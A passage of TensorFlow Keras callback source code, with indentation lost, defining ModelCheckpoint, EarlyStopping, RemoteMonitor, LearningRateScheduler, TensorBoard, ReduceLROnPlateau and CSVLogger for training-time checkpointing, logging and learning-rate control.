save_weights_only=False,
mode='auto',
save_freq='epoch',
load_weights_on_restart=False,
**kwargs):
super(ModelCheckpoint, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.filepath = filepath
self.save_best_only = save_best_only
self.save_weights_only = save_weights_only
self.save_freq = save_freq
self.load_weights_on_restart = load_weights_on_restart
self.epochs_since_last_save = 0
self._samples_seen_since_last_saving = 0
# Deprecated field `period` is for the number of epochs between which
# the model is saved.
if 'period' in kwargs:
self.period = kwargs['period']
logging.warning('`period` argument is deprecated. Please use `save_freq` '
'to specify the frequency in number of samples seen.')
else:
self.period = 1
if mode not in ['auto', 'min', 'max']:
logging.warning('ModelCheckpoint mode %s is unknown, '
'fallback to auto mode.', mode)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
self.best = np.Inf
elif mode == 'max':
self.monitor_op = np.greater
self.best = -np.Inf
else:
if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):
self.monitor_op = np.greater
self.best = -np.Inf
else:
self.monitor_op = np.less
self.best = np.Inf
if self.save_freq != 'epoch' and not isinstance(self.save_freq, int):
raise ValueError('Unrecognized save_freq: {}'.format(self.save_freq))
# Only the chief worker writes model checkpoints, but all workers
# restore checkpoint at on_train_begin().
self._chief_worker_only = False
def set_model(self, model):
self.model = model
# Use name matching rather than `isinstance` to avoid circular dependencies.
if (not self.save_weights_only and
not model._is_graph_network and # pylint: disable=protected-access
model.__class__.__name__ != 'Sequential'):
self.save_weights_only = True
def on_train_begin(self, logs=None):
# TODO(rchao): Replace dc_context reference with
# distributed_training_utils.should_current_worker_load_model() once
# distributed_training_utils.py no longer depends on callbacks.py.
if K.in_multi_worker_mode(
) and not dc_context.get_current_worker_context().experimental_should_init:
# For multi-worker training, it should not restore a model in certain
# worker setting (e.g. non-chief worker in ParameterServerStrategy).
return
filepath_to_load = self._get_most_recently_modified_file_matching_pattern(
self.filepath)
if (self.load_weights_on_restart and filepath_to_load is not None and
os.path.exists(filepath_to_load)):
try:
# `filepath` may contain placeholders such as `{epoch:02d}`, and thus
# it attempts to load the most recently modified file with file name
# matching the pattern.
self.model.load_weights(filepath_to_load)
except (IOError, ValueError) as e:
raise ValueError('Error loading file from {}. Reason: {}'.format(
filepath_to_load, e))
def on_train_end(self, logs=None):
logs = logs or {}
# pylint: disable=protected-access
if self.model._ckpt_saved_epoch is not None:
# Make `_ckpt_saved_epoch` attribute `None` at the end of training as it
# is only used during the training. Currently it is decided not to
# support fault tolerance across multiple `model.fit()` or `model.fit()`
# with other `model` methods.
epoch = self.model._ckpt_saved_epoch
self.model._ckpt_saved_epoch = None
# TODO(rchao): Support all `save_weights_only` and `save_best_only` cases.
# This will be done with the help of a decoupled training state file that
# contains both epoch and model weights.
if self.save_weights_only and not self.save_best_only:
file_handle, filepath = self._get_file_handle_and_path(epoch, logs)
self.model.save_weights(filepath, overwrite=True)
self._maybe_remove_file(file_handle, filepath)
def on_batch_end(self, batch, logs=None):
logs = logs or {}
if isinstance(self.save_freq, int):
self._samples_seen_since_last_saving += logs.get('size', 1)
if self._samples_seen_since_last_saving >= self.save_freq:
self._save_model(epoch=self._current_epoch, logs=logs)
self._samples_seen_since_last_saving = 0
def on_epoch_begin(self, epoch, logs=None):
self._current_epoch = epoch
def on_epoch_end(self, epoch, logs=None):
self.epochs_since_last_save += 1
if self.save_freq == 'epoch':
self._save_model(epoch=epoch, logs=logs)
def _save_model(self, epoch, logs):
"""Saves the model.
Arguments:
epoch: the epoch this iteration is in.
logs: the `logs` dict passed in to `on_batch_end` or `on_epoch_end`.
"""
logs = logs or {}
if isinstance(self.save_freq,
int) or self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
file_handle, filepath = self._get_file_handle_and_path(epoch, logs)
if self.save_best_only:
current = logs.get(self.monitor)
if current is None:
logging.warning('Can save best model only with %s available, '
'skipping.', self.monitor)
else:
if self.monitor_op(current, self.best):
if self.verbose > 0:
print('\nEpoch %05d: %s improved from %0.5f to %0.5f,'
' saving model to %s' % (epoch + 1, self.monitor, self.best,
current, filepath))
self.best = current
if self.save_weights_only:
self.model.save_weights(filepath, overwrite=True)
else:
self.model.save(filepath, overwrite=True)
else:
if self.verbose > 0:
print('\nEpoch %05d: %s did not improve from %0.5f' %
(epoch + 1, self.monitor, self.best))
else:
if self.verbose > 0:
print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath))
if self.save_weights_only:
if K.in_multi_worker_mode():
# TODO(rchao): Save to an additional training state file for FT,
# instead of adding an attr to weight file. With this we can support
# the cases of all combinations with `save_weights_only`,
# `save_best_only`, and `save_format` parameters.
# pylint: disable=protected-access
self.model._ckpt_saved_epoch = epoch
self.model.save_weights(filepath, overwrite=True)
else:
self.model.save(filepath, overwrite=True)
self._maybe_remove_file(file_handle, filepath)
def _get_file_handle_and_path(self, epoch, logs):
"""Returns the file handle and path."""
# TODO(rchao): Replace dc_context reference with
# distributed_training_utils.should_current_worker_checkpoint() once
# distributed_training_utils.py no longer depends on callbacks.py.
if not K.in_multi_worker_mode() or dc_context.get_current_worker_context(
).should_checkpoint:
return None, self.filepath.format(epoch=epoch + 1, **logs)
else:
# If this is multi-worker training, and this worker should not
# save checkpoint, we replace the filepath with a dummy filepath so
# it writes to a file that will be removed at the end of _save_model()
# call. This is because the SyncOnReadVariable needs to be synced across
# all the workers in order to be read, and all workers need to initiate
# that.
file_handle, temp_file_name = tempfile.mkstemp()
extension = os.path.splitext(self.filepath)[1]
return file_handle, temp_file_name + '.' + extension
def _maybe_remove_file(self, file_handle, filepath):
# Remove the file in multi-worker training where this worker should
# not checkpoint. It is a dummy file previously saved for sync distributed
# training.
if K.in_multi_worker_mode(
) and not dc_context.get_current_worker_context().should_checkpoint:
os.close(file_handle)
os.remove(filepath)
def _get_most_recently_modified_file_matching_pattern(self, pattern):
"""Returns the most recently modified filepath matching pattern.
Pattern may contain python formatting placeholder. If
`tf.train.latest_checkpoint()` does not return None, use that; otherwise,
check for most recently modified one that matches the pattern.
In the rare case where there are more than one pattern-matching file having
the same modified time that is most recent among all, return the filepath
that is largest (by `>` operator, lexicographically using the numeric
equivalents). This provides a tie-breaker when multiple files are most
recent. Note that a larger `filepath` can sometimes indicate a later time of
modification (for instance, when epoch/batch is used as formatting option),
but not necessarily (when accuracy or loss is used). The tie-breaker is
put in the logic as best effort to return the most recent, and to avoid
undeterministic result.
Modified time of a file is obtained with `os.path.getmtime()`.
This utility function is best demonstrated via an example:
```python
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
# Write something to each of the files
self.assertEqual(
_get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
```
Arguments:
pattern: The file pattern that may optionally contain python placeholder
such as `{epoch:02d}`.
Returns:
The most recently modified file's full filepath matching `pattern`. If
`pattern` does not contain any placeholder, this returns the filepath
that
exactly matches `pattern`. Returns `None` if no match is found.
"""
dir_name = os.path.dirname(pattern)
base_name = os.path.basename(pattern)
base_name_regex = '^' + re.sub(r'{.*}', r'.*', base_name) + '$'
# If tf.train.latest_checkpoint tells us there exists a latest checkpoint,
# use that as it is more robust than `os.path.getmtime()`.
latest_tf_checkpoint = checkpoint_management.latest_checkpoint(dir_name)
if latest_tf_checkpoint is not None and re.match(
base_name_regex, os.path.basename(latest_tf_checkpoint)):
return latest_tf_checkpoint
latest_mod_time = 0
file_path_with_latest_mod_time = None
n_file_with_latest_mod_time = 0
file_path_with_largest_file_name = None
if os.path.exists(dir_name):
for file_name in os.listdir(dir_name):
# Only consider if `file_name` matches the pattern.
if re.match(base_name_regex, file_name):
file_path = os.path.join(dir_name, file_name)
mod_time = os.path.getmtime(file_path)
if (file_path_with_largest_file_name is None or
file_path > file_path_with_largest_file_name):
file_path_with_largest_file_name = file_path
if mod_time > latest_mod_time:
latest_mod_time = mod_time
file_path_with_latest_mod_time = file_path
# In the case a file with later modified time is found, reset
# the counter for the number of files with latest modified time.
n_file_with_latest_mod_time = 1
elif mod_time == latest_mod_time:
# In the case a file has modified time tied with the most recent,
# increment the counter for the number of files with latest modified
# time by 1.
n_file_with_latest_mod_time += 1
if n_file_with_latest_mod_time == 1:
# Return the sole file that has most recent modified time.
return file_path_with_latest_mod_time
else:
# If there are more than one file having latest modified time, return
# the file path with the largest file name.
return file_path_with_largest_file_name
@keras_export('keras.callbacks.EarlyStopping')
class EarlyStopping(Callback):
"""Stop training when a monitored quantity has stopped improving.
Arguments:
monitor: Quantity to be monitored.
min_delta: Minimum change in the monitored quantity
to qualify as an improvement, i.e. an absolute
change of less than min_delta, will count as no
improvement.
patience: Number of epochs with no improvement
after which training will be stopped.
verbose: verbosity mode.
mode: One of `{"auto", "min", "max"}`. In `min` mode,
training will stop when the quantity
monitored has stopped decreasing; in `max`
mode it will stop when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity.
baseline: Baseline value for the monitored quantity.
Training will stop if the model doesn't show improvement over the
baseline.
restore_best_weights: Whether to restore model weights from
the epoch with the best value of the monitored quantity.
If False, the model weights obtained at the last step of
training are used.
Example:
```python
callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=3)
# This callback will stop the training when there is no improvement in
# the validation loss for three consecutive epochs.
model.fit(data, labels, epochs=100, callbacks=[callback],
validation_data=(val_data, val_labels))
```
"""
def __init__(self,
monitor='val_loss',
min_delta=0,
patience=0,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=False):
super(EarlyStopping, self).__init__()
self.monitor = monitor
self.patience = patience
self.verbose = verbose
self.baseline = baseline
self.min_delta = abs(min_delta)
self.wait = 0
self.stopped_epoch = 0
self.restore_best_weights = restore_best_weights
self.best_weights = None
if mode not in ['auto', 'min', 'max']:
logging.warning('EarlyStopping mode %s is unknown, '
'fallback to auto mode.', mode)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
elif mode == 'max':
self.monitor_op = np.greater
else:
if 'acc' in self.monitor:
self.monitor_op = np.greater
else:
self.monitor_op = np.less
if self.monitor_op == np.greater:
self.min_delta *= 1
else:
self.min_delta *= -1
def on_train_begin(self, logs=None):
# Allow instances to be re-used
self.wait = 0
self.stopped_epoch = 0
if self.baseline is not None:
self.best = self.baseline
else:
self.best = np.Inf if self.monitor_op == np.less else -np.Inf
def on_epoch_end(self, epoch, logs=None):
current = self.get_monitor_value(logs)
if current is None:
return
if self.monitor_op(current - self.min_delta, self.best):
self.best = current
self.wait = 0
if self.restore_best_weights:
self.best_weights = self.model.get_weights()
else:
self.wait += 1
if self.wait >= self.patience:
self.stopped_epoch = epoch
self.model.stop_training = True
if self.restore_best_weights:
if self.verbose > 0:
print('Restoring model weights from the end of the best epoch.')
self.model.set_weights(self.best_weights)
def on_train_end(self, logs=None):
if self.stopped_epoch > 0 and self.verbose > 0:
print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))
def get_monitor_value(self, logs):
logs = logs or {}
monitor_value = logs.get(self.monitor)
if monitor_value is None:
logging.warning('Early stopping conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
return monitor_value
@keras_export('keras.callbacks.RemoteMonitor')
class RemoteMonitor(Callback):
"""Callback used to stream events to a server.
Requires the `requests` library.
Events are sent to `root + '/publish/epoch/end/'` by default. Calls are
HTTP POST, with a `data` argument which is a
JSON-encoded dictionary of event data.
If send_as_json is set to True, the content type of the request will be
application/json. Otherwise the serialized JSON will be sent within a form.
Arguments:
root: String; root url of the target server.
path: String; path relative to `root` to which the events will be sent.
field: String; JSON field under which the data will be stored.
The field is used only if the payload is sent within a form
(i.e. send_as_json is set to False).
headers: Dictionary; optional custom HTTP headers.
send_as_json: Boolean; whether the request should be
sent as application/json.
"""
def __init__(self,
root='http://localhost:9000',
path='/publish/epoch/end/',
field='data',
headers=None,
send_as_json=False):
super(RemoteMonitor, self).__init__()
self.root = root
self.path = path
self.field = field
self.headers = headers
self.send_as_json = send_as_json
def on_epoch_end(self, epoch, logs=None):
if requests is None:
raise ImportError('RemoteMonitor requires the `requests` library.')
logs = logs or {}
send = {}
send['epoch'] = epoch
for k, v in logs.items():
send[k] = v
try:
if self.send_as_json:
requests.post(self.root + self.path, json=send, headers=self.headers)
else:
requests.post(
self.root + self.path, {self.field: json.dumps(send)},
headers=self.headers)
except requests.exceptions.RequestException:
logging.warning('Warning: could not reach RemoteMonitor '
'root server at ' + str(self.root))
@keras_export('keras.callbacks.LearningRateScheduler')
class LearningRateScheduler(Callback):
"""Learning rate scheduler.
Arguments:
schedule: a function that takes an epoch index as input
(integer, indexed from 0) and returns a new
learning rate as output (float).
verbose: int. 0: quiet, 1: update messages.
```python
# This function keeps the learning rate at 0.001 for the first ten epochs
# and decreases it exponentially after that.
def scheduler(epoch):
if epoch < 10:
return 0.001
else:
return 0.001 * tf.math.exp(0.1 * (10 - epoch))
callback = tf.keras.callbacks.LearningRateScheduler(scheduler)
model.fit(data, labels, epochs=100, callbacks=[callback],
validation_data=(val_data, val_labels))
```
"""
def __init__(self, schedule, verbose=0):
super(LearningRateScheduler, self).__init__()
self.schedule = schedule
self.verbose = verbose
def on_epoch_begin(self, epoch, logs=None):
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
try: # new API
lr = float(K.get_value(self.model.optimizer.lr))
lr = self.schedule(epoch, lr)
except TypeError: # Support for old API for backward compatibility
lr = self.schedule(epoch)
if not isinstance(lr, (float, np.float32, np.float64)):
raise ValueError('The output of the "schedule" function '
'should be float.')
K.set_value(self.model.optimizer.lr, lr)
if self.verbose > 0:
print('\nEpoch %05d: LearningRateScheduler reducing learning '
'rate to %s.' % (epoch + 1, lr))
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
@keras_export('keras.callbacks.TensorBoard', v1=[])
class TensorBoard(Callback):
# pylint: disable=line-too-long
"""Enable visualizations for TensorBoard.
TensorBoard is a visualization tool provided with TensorFlow.
This callback logs events for TensorBoard, including:
* Metrics summary plots
* Training graph visualization
* Activation histograms
* Sampled profiling
If you have installed TensorFlow with pip, you should be able
to launch TensorBoard from the command line:
```sh
tensorboard --logdir=path_to_your_logs
```
You can find more information about TensorBoard
[here](https://www.tensorflow.org/get_started/summaries_and_tensorboard).
Arguments:
log_dir: the path of the directory where to save the log files to be
parsed by TensorBoard.
histogram_freq: frequency (in epochs) at which to compute activation and
weight histograms for the layers of the model. If set to 0, histograms
won't be computed. Validation data (or split) must be specified for
histogram visualizations.
write_graph: whether to visualize the graph in TensorBoard. The log file
can become quite large when write_graph is set to True.
write_images: whether to write model weights to visualize as image in
TensorBoard.
update_freq: `'batch'` or `'epoch'` or integer. When using `'batch'`,
writes the losses and metrics to TensorBoard after each batch. The same
applies for `'epoch'`. If using an integer, let's say `1000`, the
callback will write the metrics and losses to TensorBoard every 1000
samples. Note that writing too frequently to TensorBoard can slow down
your training.
profile_batch: Profile the batch to sample compute characteristics. By
default, it will profile the second batch. Set profile_batch=0 to
disable profiling. Must run in TensorFlow eager mode.
embeddings_freq: frequency (in epochs) at which embedding layers will
be visualized. If set to 0, embeddings won't be visualized.
embeddings_metadata: a dictionary which maps layer name to a file name in
which metadata for this embedding layer is saved. See the
[details](
https://www.tensorflow.org/how_tos/embedding_viz/#metadata_optional)
about metadata files format. In case if the same metadata file is
used for all embedding layers, string can be passed.
Raises:
ValueError: If histogram_freq is set and no validation data is provided.
"""
# pylint: enable=line-too-long
def __init__(self,
log_dir='logs',
histogram_freq=0,
write_graph=True,
write_images=False,
update_freq='epoch',
profile_batch=2,
embeddings_freq=0,
embeddings_metadata=None,
**kwargs):
super(TensorBoard, self).__init__()
self._validate_kwargs(kwargs)
self.log_dir = log_dir
self.histogram_freq = histogram_freq
self.write_graph = write_graph
self.write_images = write_images
if update_freq == 'batch':
self.update_freq = 1
else:
self.update_freq = update_freq
self.embeddings_freq = embeddings_freq
self.embeddings_metadata = embeddings_metadata
self._samples_seen = 0
self._samples_seen_at_last_write = 0
self._current_batch = 0
self._total_batches_seen = 0
self._total_val_batches_seen = 0
# A collection of file writers currently in use, to be closed when
# training ends for this callback. Writers are keyed by the
# directory name under the root logdir: e.g., "train" or
# "validation".
self._writers = {}
self._train_run_name = 'train'
self._validation_run_name = 'validation'
self._profile_batch = profile_batch
# True when a trace is running.
self._is_tracing = False
# TensorBoard should only write summaries on the chief when in a
# Multi-Worker setting.
self._chief_worker_only = True
def _validate_kwargs(self, kwargs):
"""Handle arguments were supported in V1."""
if kwargs.get('write_grads', False):
logging.warning('`write_grads` will be ignored in TensorFlow 2.0 '
'for the `TensorBoard` Callback.')
if kwargs.get('batch_size', False):
logging.warning('`batch_size` is no longer needed in the '
'`TensorBoard` Callback and will be ignored '
'in TensorFlow 2.0.')
if kwargs.get('embeddings_layer_names', False):
logging.warning('`embeddings_layer_names` is not supported in '
'TensorFlow 2.0. Instead, all `Embedding` layers '
'will be visualized.')
if kwargs.get('embeddings_data', False):
logging.warning('`embeddings_data` is not supported in TensorFlow '
'2.0. Instead, all `Embedding` variables will be '
'visualized.')
unrecognized_kwargs = set(kwargs.keys()) - {
'write_grads', 'embeddings_layer_names', 'embeddings_data', 'batch_size'
}
# Only allow kwargs that were supported in V1.
if unrecognized_kwargs:
raise ValueError('Unrecognized arguments in `TensorBoard` '
'Callback: ' + str(unrecognized_kwargs))
def set_model(self, model):
"""Sets Keras model and writes graph if specified."""
self.model = model
with context.eager_mode():
self._close_writers()
if self.write_graph:
with self._get_writer(self._train_run_name).as_default():
with summary_ops_v2.always_record_summaries():
if not model.run_eagerly:
summary_ops_v2.graph(K.get_graph(), step=0)
summary_writable = (
self.model._is_graph_network or # pylint: disable=protected-access
self.model.__class__.__name__ == 'Sequential') # pylint: disable=protected-access
if summary_writable:
summary_ops_v2.keras_model('keras', self.model, step=0)
if self.embeddings_freq:
self._configure_embeddings()
def _configure_embeddings(self):
"""Configure the Projector for embeddings."""
# TODO(omalleyt): Add integration tests.
from tensorflow.python.keras.layers import embeddings
try:
from tensorboard.plugins import projector
except ImportError:
raise ImportError('Failed to import TensorBoard. Please make sure that '
'TensorBoard integration is complete."')
config = projector.ProjectorConfig()
for layer in self.model.layers:
if isinstance(layer, embeddings.Embedding):
embedding = config.embeddings.add()
embedding.tensor_name = layer.embeddings.name
if self.embeddings_metadata is not None:
if isinstance(self.embeddings_metadata, str):
embedding.metadata_path = self.embeddings_metadata
else:
if layer.name in embedding.metadata_path:
embedding.metadata_path = self.embeddings_metadata.pop(layer.name)
if self.embeddings_metadata:
raise ValueError('Unrecognized `Embedding` layer names passed to '
'`keras.callbacks.TensorBoard` `embeddings_metadata` '
'argument: ' + str(self.embeddings_metadata.keys()))
class DummyWriter(object):
"""Dummy writer to conform to `Projector` API."""
def __init__(self, logdir):
self.logdir = logdir
def get_logdir(self):
return self.logdir
writer = DummyWriter(self.log_dir)
projector.visualize_embeddings(writer, config)
def _close_writers(self):
"""Close all remaining open file writers owned by this callback.
If there are no such file writers, this is a no-op.
"""
with context.eager_mode():
for writer in six.itervalues(self._writers):
writer.close()
self._writers.clear()
def _get_writer(self, writer_name):
"""Get a summary writer for the given subdirectory under the logdir.
A writer will be created if it does not yet exist.
Arguments:
writer_name: The name of the directory for which to create or
retrieve a writer. Should be either `self._train_run_name` or
`self._validation_run_name`.
Returns:
A `SummaryWriter` object.
"""
if writer_name not in self._writers:
path = os.path.join(self.log_dir, writer_name)
writer = summary_ops_v2.create_file_writer_v2(path)
self._writers[writer_name] = writer
return self._writers[writer_name]
def on_train_begin(self, logs=None):
if self._profile_batch == 1:
summary_ops_v2.trace_on(graph=True, profiler=True)
self._is_tracing = True
def on_batch_end(self, batch, logs=None):
"""Writes scalar summaries for metrics on every training batch.
Performs profiling if current batch is in profiler_batches.
Arguments:
batch: Integer, index of batch within the current epoch.
logs: Dict. Metric results for this batch.
"""
# Don't output batch_size and batch number as TensorBoard summaries
logs = logs or {}
self._samples_seen += logs.get('size', 1)
samples_seen_since = self._samples_seen - self._samples_seen_at_last_write
if self.update_freq != 'epoch' and samples_seen_since >= self.update_freq:
self._log_metrics(logs, prefix='batch_', step=self._total_batches_seen)
self._samples_seen_at_last_write = self._samples_seen
self._total_batches_seen += 1
if self._is_tracing:
self._log_trace()
elif (not self._is_tracing and
self._total_batches_seen == self._profile_batch - 1):
self._enable_trace()
def on_epoch_end(self, epoch, logs=None):
"""Runs metrics and histogram summaries at epoch end."""
step = epoch if self.update_freq == 'epoch' else self._samples_seen
self._log_metrics(logs, prefix='epoch_', step=step)
if self.histogram_freq and epoch % self.histogram_freq == 0:
self._log_weights(epoch)
if self.embeddings_freq and epoch % self.embeddings_freq == 0:
self._log_embeddings(epoch)
def on_train_end(self, logs=None):
if self._is_tracing:
self._log_trace()
self._close_writers()
def _enable_trace(self):
if context.executing_eagerly():
summary_ops_v2.trace_on(graph=True, profiler=True)
self._is_tracing = True
def _log_trace(self):
if context.executing_eagerly():
with self._get_writer(self._train_run_name).as_default(), \
summary_ops_v2.always_record_summaries():
# TODO(b/126388999): Remove step info in the summary name.
summary_ops_v2.trace_export(
name='batch_%d' % self._total_batches_seen,
step=self._total_batches_seen,
profiler_outdir=os.path.join(self.log_dir, 'train'))
self._is_tracing = False
def _log_metrics(self, logs, prefix, step):
"""Writes metrics out as custom scalar summaries.
Arguments:
logs: Dict. Keys are scalar summary names, values are NumPy scalars.
prefix: String. The prefix to apply to the scalar summary names.
step: Int. The global step to use for TensorBoard.
"""
if logs is None:
logs = {}
# Group metrics by the name of their associated file writer. Values
# are lists of metrics, as (name, scalar_value) pairs.
logs_by_writer = {
self._train_run_name: [],
self._validation_run_name: [],
}
validation_prefix = 'val_'
for (name, value) in logs.items():
if name in ('batch', 'size', 'num_steps'):
# Scrub non-metric items.
continue
if name.startswith(validation_prefix):
name = name[len(validation_prefix):]
writer_name = self._validation_run_name
else:
writer_name = self._train_run_name
name = prefix + name # assign batch or epoch prefix
logs_by_writer[writer_name].append((name, value))
with context.eager_mode():
with summary_ops_v2.always_record_summaries():
for writer_name in logs_by_writer:
these_logs = logs_by_writer[writer_name]
if not these_logs:
# Don't create a "validation" events file if we don't
# actually have any validation data.
continue
writer = self._get_writer(writer_name)
with writer.as_default():
for (name, value) in these_logs:
summary_ops_v2.scalar(name, value, step=step)
def _log_weights(self, epoch):
"""Logs the weights of the Model to TensorBoard."""
writer = self._get_writer(self._train_run_name)
with context.eager_mode(), \
writer.as_default(), \
summary_ops_v2.always_record_summaries():
for layer in self.model.layers:
for weight in layer.weights:
weight_name = weight.name.replace(':', '_')
with ops.init_scope():
weight = K.get_value(weight)
summary_ops_v2.histogram(weight_name, weight, step=epoch)
if self.write_images:
self._log_weight_as_image(weight, weight_name, epoch)
writer.flush()
def _log_weight_as_image(self, weight, weight_name, epoch):
"""Logs a weight as a TensorBoard image."""
w_img = array_ops.squeeze(weight)
shape = K.int_shape(w_img)
if len(shape) == 1: # Bias case
w_img = array_ops.reshape(w_img, [1, shape[0], 1, 1])
elif len(shape) == 2: # Dense layer kernel case
if shape[0] > shape[1]:
w_img = array_ops.transpose(w_img)
shape = K.int_shape(w_img)
w_img = array_ops.reshape(w_img, [1, shape[0], shape[1], 1])
elif len(shape) == 3: # ConvNet case
if K.image_data_format() == 'channels_last':
# Switch to channels_first to display every kernel as a separate
# image.
w_img = array_ops.transpose(w_img, perm=[2, 0, 1])
shape = K.int_shape(w_img)
w_img = array_ops.reshape(w_img, [shape[0], shape[1], shape[2], 1])
shape = K.int_shape(w_img)
# Not possible to handle 3D convnets etc.
if len(shape) == 4 and shape[-1] in [1, 3, 4]:
summary_ops_v2.image(weight_name, w_img, step=epoch)
def _log_embeddings(self, epoch):
embeddings_ckpt = os.path.join(self.log_dir, 'train',
'keras_embedding.ckpt-{}'.format(epoch))
self.model.save_weights(embeddings_ckpt)
@keras_export('keras.callbacks.ReduceLROnPlateau')
class ReduceLROnPlateau(Callback):
"""Reduce learning rate when a metric has stopped improving.
Models often benefit from reducing the learning rate by a factor
of 2-10 once learning stagnates. This callback monitors a
quantity and if no improvement is seen for a 'patience' number
of epochs, the learning rate is reduced.
Example:
```python
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,
patience=5, min_lr=0.001)
model.fit(X_train, Y_train, callbacks=[reduce_lr])
```
Arguments:
monitor: quantity to be monitored.
factor: factor by which the learning rate will be reduced. new_lr = lr *
factor
patience: number of epochs with no improvement after which learning rate
will be reduced.
verbose: int. 0: quiet, 1: update messages.
mode: one of {auto, min, max}. In `min` mode, lr will be reduced when the
quantity monitored has stopped decreasing; in `max` mode it will be
reduced when the quantity monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred from the name of the
monitored quantity.
min_delta: threshold for measuring the new optimum, to only focus on
significant changes.
cooldown: number of epochs to wait before resuming normal operation after
lr has been reduced.
min_lr: lower bound on the learning rate.
"""
def __init__(self,
monitor='val_loss',
factor=0.1,
patience=10,
verbose=0,
mode='auto',
min_delta=1e-4,
cooldown=0,
min_lr=0,
**kwargs):
super(ReduceLROnPlateau, self).__init__()
self.monitor = monitor
if factor >= 1.0:
raise ValueError('ReduceLROnPlateau ' 'does not support a factor >= 1.0.')
if 'epsilon' in kwargs:
min_delta = kwargs.pop('epsilon')
logging.warning('`epsilon` argument is deprecated and '
'will be removed, use `min_delta` instead.')
self.factor = factor
self.min_lr = min_lr
self.min_delta = min_delta
self.patience = patience
self.verbose = verbose
self.cooldown = cooldown
self.cooldown_counter = 0 # Cooldown counter.
self.wait = 0
self.best = 0
self.mode = mode
self.monitor_op = None
self._reset()
def _reset(self):
"""Resets wait counter and cooldown counter.
"""
if self.mode not in ['auto', 'min', 'max']:
logging.warning('Learning Rate Plateau Reducing mode %s is unknown, '
'fallback to auto mode.', self.mode)
self.mode = 'auto'
if (self.mode == 'min' or
(self.mode == 'auto' and 'acc' not in self.monitor)):
self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)
self.best = np.Inf
else:
self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)
self.best = -np.Inf
self.cooldown_counter = 0
self.wait = 0
def on_train_begin(self, logs=None):
self._reset()
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
current = logs.get(self.monitor)
if current is None:
logging.warning('Reduce LR on plateau conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
else:
if self.in_cooldown():
self.cooldown_counter -= 1
self.wait = 0
if self.monitor_op(current, self.best):
self.best = current
self.wait = 0
elif not self.in_cooldown():
self.wait += 1
if self.wait >= self.patience:
old_lr = float(K.get_value(self.model.optimizer.lr))
if old_lr > self.min_lr:
new_lr = old_lr * self.factor
new_lr = max(new_lr, self.min_lr)
K.set_value(self.model.optimizer.lr, new_lr)
if self.verbose > 0:
print('\nEpoch %05d: ReduceLROnPlateau reducing learning '
'rate to %s.' % (epoch + 1, new_lr))
self.cooldown_counter = self.cooldown
self.wait = 0
def in_cooldown(self):
return self.cooldown_counter > 0
@keras_export('keras.callbacks.CSVLogger')
class CSVLogger(Callback):
"""Callback that streams epoch results to a csv file.
Supports all values that can be represented as a string,
including 1D iterables such as np.ndarray.
Example:
```python
csv_logger = CSVLogger('training.log')
model.fit(X_train, Y_train, callbacks=[csv_logger])
```
Arguments:
filename: filename of the csv file, e.g. 'run/log.csv'.
separator: string used to separate elements in the csv file.
append: True: append if file exists (useful for continuing
training). False: overwrite existing file,
"""
def __init__(self, filename, separator=',', append=False):
self.sep = separator
self.filename = filename
self.append = append
self.writer = None
self.keys = None
self.append_header = True
if six.PY2:
self.file_flags = 'b'
self._open_args = {}
else:
self.file_flags = ''
self._open_args = {'newline': '\n'}
super(CSVLogger, self).__init__()
def on_train_begin(self, logs=None):
if self.append:
if os.path.exists(self.filename):
with open(self.filename, 'r' + self.file_flags) as f:
self.append_header = not bool(len(f.readline()))
mode = 'a'
else:
mode = 'w'
self.csv_file = io.open(self.filename,
mode + self.file_flags,
**self._open_args)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
def handle_value(k):
is_zero_dim_ndarray = isinstance(k, np.ndarray) and k.ndim == 0
if isinstance(k, six.string_types):
return k
elif isinstance(k, collections.Iterable) and not is_zero_dim_ndarray:
return '"[%s]"' % (', '.join(map(str, k)))
else:
return k
if self.keys is None:
self.keys = sorted(logs.keys())
if self.model.stop_training:
# We set NA so that csv parsers do not fail for this last epoch.
logs = dict([(k, logs[k]) if k in logs else (k, 'NA') for k in self.keys])
if not self.writer:
class CustomDialect(csv.excel):
delimiter = self.sep
fieldnames = ['epoch'] + self.keys
if six.PY2:
fieldnames = [unicode(x) for x in fieldnames]
self.writer = csv.DictWriter(
self.csv_file,
fieldnames=fieldnames,
dialect=CustomDialect)
if self.append_header:
self.writer.writeheader()
row_dict = collections.OrderedDict({'epoch': epoch})
row_dict.update((key, handle_value(logs[key])) for key in self.keys)
self.writer.writerow(row_dict)
self.csv_file.flush()
def on_train_end(self, logs=None):
self.csv_file.close()
self.writer = None
@keras_export('keras.callbacks.LambdaCallback')
class LambdaCallback(Callback):
r"""Callback for creating simple, custom callbacks on-the-fly.
This callback is constructed with anonymous functions that will be called
at the appropriate time. Note that the callbacks expects positional
arguments, as:
- `on_epoch_begin` and `on_epoch_end` expect two positional arguments:
`epoch`, `logs`
- `on_batch_begin` and `on_batch_end` expect two positional arguments:
`batch`, `logs`
